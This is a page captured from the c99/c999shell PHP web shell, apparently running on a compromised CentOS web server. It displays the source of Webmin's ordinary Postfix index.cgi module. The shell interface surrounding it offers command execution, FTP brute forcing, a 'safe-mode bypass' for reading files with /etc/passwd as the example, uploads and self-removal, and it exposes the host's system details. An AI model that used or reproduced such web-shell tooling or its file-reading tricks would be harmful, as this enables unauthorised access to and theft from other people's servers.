!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postfix/   drwxr-xr-x
Free 49.59 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.cgi (4.35 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
#
# postfix-module by Guillaume Cottenceau <gc@mandrakesoft.com>,
# for webmin by Jamie Cameron
#
# A word about this module.
#
# Postfix provides a command to control its parameters: `postconf'.
# That's the reason why I don't parse and set the values manually.
# It's much better because it can resist to changes of the Postfix
# config files.
#
# However, to `set back to default' an already changed parameter,
# there is no way to do it in the case of dynamic parameters.
# [example: I mean that for `static' parameters, which defaults to
# `0', I can set the parameter to `0' ; but for `dynamic'
# parameters such as domainname [which comes from a system call]
# I have no way]
# So for this special case, I parse the config file, and delete
# manually the correct line.
#
# gc.
#


require './postfix-lib.pl';

if (&has_command($config{'postfix_config_command'}) &&
    &backquote_command("$config{'postfix_config_command'} mail_version 2>&1", 1) =~ /mail_version\s*=\s*(.*)/) {
    # Got the version
    $postfix_version = $1;
    }
&ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1, 0,
    &help_search_link("postfix", "man", "doc", "google"),
    undef, undef, $postfix_version ?
        &text('index_version', $postfix_version) : undef);

# Save the version for use by other CGIs
&open_tempfile(VERSION, ">$module_config_directory/version", 0, 1);
&print_tempfile(VERSION, "$postfix_version\n");
&close_tempfile(VERSION);

# Verify the postfix control command
if (!&valid_postfix_command($config{'postfix_control_command'})) {
    print &text('index_epath',
        "<tt>$config{'postfix_control_command'}</tt>",
        "../config.cgi?$module_name"),"<p>\n";

    &foreign_require("software", "software-lib.pl");
    $lnk = &software::missing_install_link(
            "postfix", $text{'index_postfix'},
            "../$module_name/", $text{'index_title'});
    print $lnk,"<p>\n" if ($lnk);

    &ui_print_footer("/", $text{'index'});
    exit;
    }

# Verify the postfix config command
if (!&valid_postfix_command($config{'postfix_config_command'})) {
    print &text('index_econfig',
        "<tt>$config{'postfix_config_command'}</tt>",
        "../config.cgi?$module_name"),"<p>\n";
    &ui_print_footer("/", $text{'index'});
    exit;
    }

# Verify the postsuper command
if (!&valid_postfix_command($config{'postfix_super_command'})) {
    print &text('index_esuper',
        "<tt>$config{'postfix_super_command'}</tt>",
        "../config.cgi?$module_name"),"<p>\n";
    &ui_print_footer("/", $text{'index'});
    exit;
    }

# Verify that current configuration is valid. If not, only allow manual editing
if ($config{'index_check'} && ($err = &check_postfix())) {
    print &text('check_error'),"<p>\n";
    print "<pre>$err</pre>\n";
    if ($access{'manual'}) {
        print "<a href=edit_manual.cgi>$text{'check_manual'}</a><p>\n";
        }
    &ui_print_footer("/", $text{'index'});
    exit;
    }

@onames =  ( "general", "address_rewriting", "aliases", "canonical",
         "virtual", "transport", "relocated", "header", "body", "bcc",
         $postfix_version =~ /^3\./ ||
          $postfix_version =~ /^2\.(\d+)/ && $1 > 7 ? ( "dependent" ) : ( ),
         "local_delivery", "resource",
         "smtpd", "smtp", "sasl", "client",
         "rate", "debug", $postfix_version > 2 ? ( ) : ( "ldap" ),
         "master", "mailq", "postfinger", "boxes", "manual" );

$access{'boxes'} = &foreign_available("mailboxes");
foreach $oitem (@onames)
{
    if ($access{$oitem}) {
        push (@olinks, $oitem eq "boxes" ? "../mailboxes/"
                         : $oitem . ".cgi");
        push (@otitles, $oitem eq 'manual' ? $text{'cmanual_title'}
                           : $text{$oitem . "_title"});
        if ($oitem eq 'mailq' && !$config{'mailq_count'}) {
            # Count the queue
            local @mqueue = &list_queue(0);
            local $mcount = scalar(@mqueue);
            $otitles[$#otitles] .=
                "<br>".&text('mailq_count', $mcount);
            }
        push (@oicons, "images/" . $oitem . ".gif");
    }
}

&icons_table(\@olinks, \@otitles, \@oicons);


if ($access{'startstop'})
{
    print &ui_hr();

    if (&is_postfix_running())
    {
    print "<table cellpadding=5 width=100%><tr><td>\n";
    print "<form action=stop.cgi>\n";
    print "<input type=submit value=\"$text{'index_stop'}\">\n";
    print "</td> <td>$text{'index_stopmsg'}\n";
    }
    else
    {
    print "<table cellpadding=5 width=100%><tr><td>\n";
    print "<form action=start.cgi>\n";
    print "<input type=submit value=\"$text{'index_start'}\">\n";
    print "</td> <td>$text{'index_startmsg'}\n";
    }
    print "</td></tr></table></form>\n";
}

&ui_print_footer("/", $text{'index'});

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0474 ]--